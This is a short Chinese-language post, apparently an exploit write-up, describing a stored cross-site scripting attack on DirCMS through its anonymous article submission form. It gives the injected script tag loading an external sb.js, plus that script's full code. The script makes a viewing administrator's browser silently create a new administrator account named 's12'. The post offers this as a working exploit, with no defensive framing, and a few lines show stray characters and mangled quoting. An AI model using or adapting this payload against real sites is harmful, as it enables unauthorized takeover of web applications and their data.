dircms xss 跨站漏洞利用方法

发布作者：心灵

官方网站：www.dircms.net

bug在于在线投稿功能，无须注册等待审核……

http://www.xxx.com/post/index.php?catid=49

fckeditor编辑器点击源码，写入跨站代码：

<script src=”http://www.xxxx.com/sb.js” </script>

sb.js内容长度限制500，如下：

var oReq = new ActiveXObject(“MSXML2.XMLHTTP”);

var str = “do_submit=1&newadmin[username]=s12&newadmin[allowmultilogin]=1&newadmin[roleid]=1&newadmin[disabled]=0″;

3 oReq.open(“POST”,”http://www.xxx.com/admin.php?file=admin&action=add”,false);

oReq.setRequestHeader(“Content-Length”,str.length);

oReq.setRequestHeader(“CONTENT-TYPE”,”application/x-www-form-urlencoded”);

oReq.send(str);

当管理员查看投稿文章，便会出发xss攻击；添加帐号s12为管理员权限。